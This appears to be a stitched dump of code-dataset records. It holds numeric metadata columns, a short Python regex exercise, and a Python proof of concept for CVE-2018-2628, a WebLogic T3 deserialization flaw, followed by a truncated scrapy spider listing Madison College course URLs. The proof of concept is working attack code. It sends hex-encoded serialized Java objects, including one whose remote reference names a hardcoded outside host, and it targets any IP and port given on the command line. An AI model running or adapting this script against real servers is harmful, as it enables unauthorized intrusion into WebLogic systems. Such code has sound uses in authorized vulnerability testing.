| 174
| 7.1
| 0.65
| 0.197183
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097701
| 174
| 6
| 52
| 29
| 0.904459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
72ea66d5ad5a6d8a62759613cd568e45a1e387b5
| 179
|
py
|
Python
|
7day/re/Re11.py
|
jsjang93/joony
|
62f7a325094c887212b894932263bf84500e0f03
|
[
"MIT"
] | null | null | null |
7day/re/Re11.py
|
jsjang93/joony
|
62f7a325094c887212b894932263bf84500e0f03
|
[
"MIT"
] | null | null | null |
7day/re/Re11.py
|
jsjang93/joony
|
62f7a325094c887212b894932263bf84500e0f03
|
[
"MIT"
] | null | null | null |
import re
print(re.search( "^ap","apple"))
print(re.search("[^ap]","apple"))
print(re.search("[^ab]","bread"))
print(re.search("[^ab]","orange"))
print(re.search("[^ap]","anana"))
| 29.833333
| 34
| 0.608939
| 27
| 179
| 4.037037
| 0.37037
| 0.321101
| 0.59633
| 0.412844
| 0.486239
| 0.486239
| 0.486239
| 0.486239
| 0
| 0
| 0
| 0
| 0.039106
| 179
| 6
| 35
| 29.833333
| 0.633721
| 0
| 0
| 0
| 0
| 0
| 0.272222
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.166667
| 0
| 0.166667
| 0.833333
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
f41364fdb6a974330d2f606eb183bfe447514600
| 6,878
|
py
|
Python
|
poc/CVE_2018_2628.py
|
rabbitmask/Weblogic-
|
05cee3a69cf403e4db5f057c569a923c107cb97b
|
[
"MIT"
] | 1,593
|
2019-05-14T05:58:32.000Z
|
2022-03-30T05:23:52.000Z
|
poc/CVE_2018_2628.py
|
secfb/WeblogicScan
|
05cee3a69cf403e4db5f057c569a923c107cb97b
|
[
"MIT"
] | 13
|
2019-09-03T17:27:29.000Z
|
2022-02-16T04:51:05.000Z
|
poc/CVE_2018_2628.py
|
secfb/WeblogicScan
|
05cee3a69cf403e4db5f057c569a923c107cb97b
|
[
"MIT"
] | 365
|
2019-05-14T06:11:09.000Z
|
2022-03-31T13:57:03.000Z
|
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
'''
____ _ _ _ _ __ __ _
| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
'''
import socket
import sys
import time
import re
VUL=['CVE-2018-2628']
PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078']
VER_SIG=['\\$Proxy[0-9]+']
def t3handshake(sock,server_addr):
sock.connect(server_addr)
sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
time.sleep(1)
sock.recv(1024)
def buildT3RequestObject(sock,rport):
data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport))
data3 = '1a7727000d3234322e323134'
data4 = '2e312e32353461863d1d0000000078'
for d in [data1,data2,data3,data4]:
sock.send(bytes.fromhex(d))
time.sleep(2)
def sendEvilObjData(sock,data):
payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
payload+=data
payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload)
sock.send(bytes.fromhex(payload))
res = ''
try:
count = 0
while count<10:
res += sock.recv(4096).decode("utf8","ignore")
time.sleep(0.1)
count += 1
except Exception:
pass
return res
def checkVul(res,rip,rport):
p=re.findall(VER_SIG[0], res, re.S)
if len(p)>0:
return (1,'[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(rip+':'+str(rport),VUL[0]))
else:
return (0,'[-] [{}] weblogic not detected {}'.format(rip+':'+str(rport),VUL[0]))
def run(rip,rport):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(20)
server_addr = (rip, rport)
t3handshake(sock,server_addr)
buildT3RequestObject(sock,rport)
rs=sendEvilObjData(sock,PAYLOAD[0])
return checkVul(rs,rip,rport)
if __name__=="__main__":
dip = sys.argv[1]
dport = int(sys.argv[2])
run(dip,dport)
| 95.527778
| 2,063
| 0.867839
| 225
| 6,878
| 26.12
| 0.457778
| 0.006806
| 0.006636
| 0.010209
| 0.007147
| 0.007147
| 0
| 0
| 0
| 0
| 0
| 0.64443
| 0.075894
| 6,878
| 72
| 2,064
| 95.527778
| 0.280208
| 0.044344
| 0
| 0
| 0
| 0
| 0.782622
| 0.758435
| 0
| 1
| 0
| 0
| 0
| 1
| 0.092593
| false
| 0.018519
| 0.074074
| 0
| 0.240741
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f413ce93b672ed29d1a3d5ac98626b596cc500dc
| 22,625
|
py
|
Python
|
Matc_links/Matc_links/spiders/get_links3.py
|
Nouldine/MyCrawlerSystem
|
7bba8ba3ec76e10f70a35700602812ee6f039b63
|
[
"MIT"
] | null | null | null |
Matc_links/Matc_links/spiders/get_links3.py
|
Nouldine/MyCrawlerSystem
|
7bba8ba3ec76e10f70a35700602812ee6f039b63
|
[
"MIT"
] | null | null | null |
Matc_links/Matc_links/spiders/get_links3.py
|
Nouldine/MyCrawlerSystem
|
7bba8ba3ec76e10f70a35700602812ee6f039b63
|
[
"MIT"
] | null | null | null |
from scrapy import Spider
from scrapy.spiders import CrawlSpider, Rule
from scrapy.selector import Selector
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.linkextractors import LinkExtractor
import scrapy
from scrapy.spidermiddlewares.httperror import HttpError
from twisted.internet.error import DNSLookupError
from twisted.internet.error import TimeoutError, TCPTimedOutError
from Matc_links.items import MatcLinksItem
class Matc_links( scrapy.Spider ):
name = 'matc_links3'
allowed_domains = ['madisoncollege.edu']
start_urls = [
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/A/ACCTG/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/A/ADMINPRF/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/A/AGMECH/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/A/ANIM/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/A/ANIMTOON/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/A/ANTHRO/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/A/ARABIC/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/A/ARCHDR/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/A/ARCHT/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/A/ART/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/A/ASTRON/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/A/AUTMFG/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/A/AUTOBODY/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/A/AUTOMECH/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/A/AUTOTEC/DEGR",
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/D/DENTAST/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/D/DENTHYG/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/D/DIESEL/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/D/DIETTEC/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/D/DRAMA/DEGR"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/H/HEALTH/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/H/HISTORY/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/H/HORT/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/H/HOSPT/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/H/HRMGT/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/H/HUMSVC/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/H/HVAC/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/H/HYDPNEU/DEGR"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/B/BAKING/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/B/BIOLOGY/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/B/BIOTECH/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/B/BLCKSMTH/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/B/BLDGS/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/B/BRCKMSN/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/B/BUSADM/DEGR"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/CABMIL/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/CARP/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/CHEM/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/CHINESE/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/CIVILET/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/COLLSUCC/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/COMM/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/COMPABE/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/COMPBSIC/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/COMPSOFT/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/CONST/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/CONSTRTR/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/COSMET/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/COURT/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/CPL/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/CRIMJUST/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/CUL%20ARTS/DEGR",
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/F/FARMBUS/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/F/FILM/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/F/FINANCE/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/F/FIRET/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/F/FOODS/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/F/FRENCH/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/F/FSHNMKTG/DEGR"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/I/IND%20MECH/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/I/INDMANUF/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/I/INDSGN/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/I/INGOVSRV/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/I/INSMGT/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/I/INSTHSKP/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/I/INSURE/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/I/IT/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/I/ITCLOUD/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/I/ITNET/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/I/ITPROG/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/I/ITSECUR/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/I/ITTECSUP/DEGR"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/EARLYCHL/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/EARTHSCI/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/ECON/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/EDSVC/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/ELEC/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/ELECENG/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/ELECMIC/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/ELECSERV/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/ELECT/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/EMS/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/ENERCONS/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/ENERSVS/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/ENG%20LANG/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/ENGLABE/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/ENGLISH/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/EVENT/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/EVTMGT/DEGR",
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/L/LABASST/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/L/LANG%20INT/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/L/LDRSHP/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/L/LITTRANS/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/L/LOGMGT/DEGR"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/M/MACHT/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/M/MASST/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/M/MATH/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/M/MATHABE/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/M/MCYCLE/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/M/MECHDR/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/M/MECTEC/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/M/MED%20SUPP/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/M/MEDADMIN/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/M/MEDREC/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/M/MEDTERM/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/M/MILLWRGT/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/M/MKTG/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/M/MTLFAB/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/M/MUSIC/DEGR"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/N/NATSCI/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/N/NONPROFT/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/N/NRSAD/DEGR"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/O/OPTOMET/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/O/ORIENT/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/O/OTASST/DEGR"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/PAINTDEC/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/PARALEG/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/PHARM/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/PHILOS/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/PHOTO/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/PHOTOVID/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/PHYED/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/PHYSICS/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/PLASTIC/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/PLASTRDC/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/PLUMBNG/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/POLISCI/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/PROF%20DEV/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/PRTPUB/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/PSYCH/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/PTASST/DEGR",
"https://my.madisoncollege.edu/app/about"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/R/RADTEC/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/R/READABE/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/R/READING/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/R/RECMGT/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/R/RENEWTHR/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/R/RESPC/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/R/RLEST/DEGR"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/S/SCIABE/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/S/SHEETMTL/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/S/SMENG/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/S/SMLBUS/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/S/SOC/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/S/SOCSCABE/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/S/SOCSCI/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/S/SPANISH/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/S/SPEECH/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/S/STDNTSUC/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/S/STEAM/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/S/STEELIRN/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/S/SUPDEV/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/S/SURGT/DEGR",
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/T/T%26D/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/T/TEL%26CBL/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/T/THERMASS/DEGR"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/V/VETTECH/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/V/VICOM/DEGR"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/G/GEN%20ST/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/G/GLBL%20ED/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/G/GLBLLANG/DEGR", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/G/GRDSGN/DEGR"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/A/ACCTGFIN/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/A/ANIMTOON/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/A/ART/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/A/ARTS/NDEG"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/B/BAKING/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/B/BIO%20TECH/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/B/BUS%26MKT/NDEG"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/D/DENTAL/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/D/DIETMGR/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/D/DRIVED/NDEG"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/CABMIL/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/CAREER/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/CARP/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/CNSTRCT/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/COMP%20PRO/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/COMPBSIC/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/COMPSOFT/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/CONSEC/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/COOKING/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/COSMET/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/C/CRIMJUST/NDEG",
"https://my.madisoncollege.edu/app/about"
